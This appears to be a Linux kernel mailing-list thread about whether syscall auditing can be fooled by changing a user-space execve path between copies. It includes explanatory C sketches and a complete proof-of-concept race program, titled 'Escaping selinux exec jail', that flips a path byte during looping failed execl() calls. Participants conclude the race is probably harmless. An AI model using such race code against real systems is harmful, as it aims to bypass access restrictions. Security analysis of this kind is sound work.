Hi David,

As I am looking into the system-wide system call tracing problem, I am
starting to wonder how auditsc deals with the fact that user space can
concurrently change the content referred to by the __user pointers.

This would be the case for execve. Suppose we create a program with two
threads: one executes execve() system calls while the other modifies the
user-space string containing the name of the program to execute. Since
there are two copy_from_user calls, one in auditsc and one in the real
execve() function, the string passed to the OS could differ from the
string seen by auditsc.

Regards,

Mathieu

--
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
--
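The double-copy concern described above can be illustrated with a small user-space sketch. This is not kernel code: fetch_string() is only a stand-in for copy_from_user, and double_fetch_differs() and flip_first_byte() are hypothetical names. The racing thread is modelled deterministically by a callback that runs between the two copies.

```c
#include <string.h>

#define PATH_BUF_LEN 64

/* Stand-in for copy_from_user(): snapshot a "user" string into a private buffer. */
static void fetch_string(char *dst, size_t dstlen, const char *user_src)
{
	strncpy(dst, user_src, dstlen - 1);
	dst[dstlen - 1] = '\0';
}

/*
 * Fetch the same "user" buffer twice, once for the auditor and once for
 * the executor. The optional callback runs between the two fetches and
 * models a writer racing with the system call.
 * Returns 1 if the two snapshots differ, 0 otherwise.
 */
static int double_fetch_differs(char *user_buf, void (*between)(char *))
{
	char audited[PATH_BUF_LEN];
	char executed[PATH_BUF_LEN];

	fetch_string(audited, sizeof(audited), user_buf);
	if (between)
		between(user_buf);
	fetch_string(executed, sizeof(executed), user_buf);

	return strcmp(audited, executed) != 0;
}

/* Hypothetical racing writer: turns "$bin/bash" into "/bin/bash". */
static void flip_first_byte(char *user_buf)
{
	user_buf[0] = '/';
}
```

Calling double_fetch_differs() on a buffer holding "$bin/bash" with flip_first_byte as the callback reports a mismatch, while passing NULL for the callback does not.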
In general we have to copy the content into kernel space, audit it, and
then act on it from there. See the explanation on the IPC audit patch at
http://lwn.net/Articles/125350/ for example.

I was going to suggest that that attack vector won't work, because
execve() kills all threads. But all you have to do to avoid that is put
the data in question into a shared writable mmap and modify it from
another _process_. And in fact I suspect there's a combination of CLONE_

Right. Don't Do That Then. The audit code should see what's _actually_
given to the child process. The audit/execve code has changed since I
last looked, but I think it's probably OK because it's reading the
contents of the new program's mm on the way back from the execve()
system call -- before ever giving the CPU back to that process.

--
dwmw2
--
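The shared-mapping variant mentioned above can be sketched as follows. This only demonstrates that a second process can rewrite a string living in a MAP_SHARED mapping; it performs no execve() and says nothing about what the audit code records. The function name is hypothetical, and MAP_ANONYMOUS is assumed to be available (Linux and the BSDs).

```c
#define _DEFAULT_SOURCE /* exposes MAP_ANONYMOUS on glibc */
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAP_LEN 4096

/*
 * Returns 1 if a write made by a child process is visible to the parent
 * through a shared writable mapping, 0 if it is not, -1 on error.
 */
static int shared_mapping_is_writable_by_other_process(void)
{
	char *path;
	pid_t pid;
	int status, seen;

	path = mmap(NULL, MAP_LEN, PROT_READ | PROT_WRITE,
		    MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (path == MAP_FAILED)
		return -1;
	strcpy(path, "$bin/bash");

	pid = fork();
	if (pid < 0) {
		munmap(path, MAP_LEN);
		return -1;
	}
	if (pid == 0) {
		/* Child: a separate process, so an execve() in the parent would not kill it. */
		path[0] = '/';
		_exit(0);
	}

	if (waitpid(pid, &status, 0) < 0) {
		munmap(path, MAP_LEN);
		return -1;
	}

	/* Parent: the string it placed in the mapping has been changed. */
	seen = (strcmp(path, "/bin/bash") == 0);
	munmap(path, MAP_LEN);
	return seen;
}
```

In a real race the parent would be inside execve() while the child keeps toggling the byte; here the child writes once and exits so that the result is deterministic.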
Even better: if execve() fails, it doesn't kill the threads. Therefore,
all we have to do is busy-loop doing failing execve() calls and
atomically change the string to what we want to be executed. Can anyone
test the sample snippet below in a context where executing /bin/bash is
disallowed on an SMP system? I don't have an SELinux setup handy. I
suppose that as soon as SELinux sees one /bin/bash exec, it will kill
the process, so a few runs would be required in order to hit the race.
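/*
 * Escaping selinux exec jail
 *
 * build with gcc -pthread -o escape-selinux escape-selinux.c
 *
 * Mathieu Desnoyers
 * License: GPL
 */
#include <stdio.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <signal.h>

/* Starts as an invalid path so that most execl() calls fail. */
static char modstring[] = "$bin/bash";

/* Keep calling execl(); a failed call returns and leaves the threads alive. */
void *thr1(void *arg)
{
	while (1) {
		/* argv[0] is passed explicitly, followed by the NULL sentinel. */
		execl(modstring, modstring, (char *)NULL);
	}
	return ((void *)1);
}

/* Flip the first byte between an invalid and a valid path. */
void *thr2(void *arg)
{
	/* volatile keeps the compiler from merging or hoisting the stores. */
	volatile char *first = &modstring[0];

	while (1) {
		*first = '$';
		*first = '/';
	}
	return ((void *)2);
}

int main()
{
	int err;
	pthread_t tid1, tid2;
	void *tret;

	err = pthread_create(&tid1, NULL, thr1, NULL);
	if (err != 0)
		exit(1);
	err = pthread_create(&tid2, NULL, thr2, NULL);
	if (err != 0)
		exit(1);
	sleep(10);
	/* Both threads loop forever, so these joins return only on error. */
	err = pthread_join(tid1, &tret);
	if (err != 0)
		exit(1);
	err = pthread_join(tid2, &tret);
	if (err != 0)
		exit(1);
	return 0;
}
--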
Mathieu Desnoyers
--
I thought SELinux hooked into syscall audit? (Sorry, I am new to the
kernel auditing field.)

The race I refer to is in the auditsc.c kernel code, so syscall audit is
what I am talking about. I mention SELinux here only because, as far as
I understand, it is one module-based callback that can hook into syscall
audit.

Mathieu
--
SELinux is a user of the audit subsystem in terms of generating audit
messages for permission denials. It doesn't rely on any inputs from the
audit subsystem.

--
Stephen Smalley
National Security Agency
--
Actually, getname/putname seem to make sure the name is only copied once
per audit context, so it should be OK.

Mathieu
--
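The copy-once idea above can be sketched in user space as follows. This is not the kernel's getname()/putname() implementation: struct call_ctx, ctx_getname() and ctx_putname() are hypothetical names, used only to show how a single cached copy gives the auditor and the executor the same string even if the source buffer changes afterwards.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical per-call context holding the single private copy. */
struct call_ctx {
	char *name; /* NULL until the first lookup */
};

/*
 * Copy the "user" string on first use; every later caller in the same
 * context gets the cached copy and never re-reads the source.
 * Returns NULL if the allocation fails.
 */
static const char *ctx_getname(struct call_ctx *ctx, const char *user_src)
{
	if (!ctx->name) {
		size_t len = strlen(user_src) + 1;

		ctx->name = malloc(len);
		if (!ctx->name)
			return NULL;
		memcpy(ctx->name, user_src, len);
	}
	return ctx->name;
}

/* Release the cached copy at the end of the call. */
static void ctx_putname(struct call_ctx *ctx)
{
	free(ctx->name);
	ctx->name = NULL;
}
```

With this shape, a caller that looks the name up for auditing, has the source buffer modified underneath it, and then looks the name up again for execution receives the same pointer and the original contents both times.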
SELinux doesn't base any of its decisions on pathname strings provided
by the user (or pathnames at all, for that matter; SELinux is

--
Stephen Smalley
National Security Agency
--
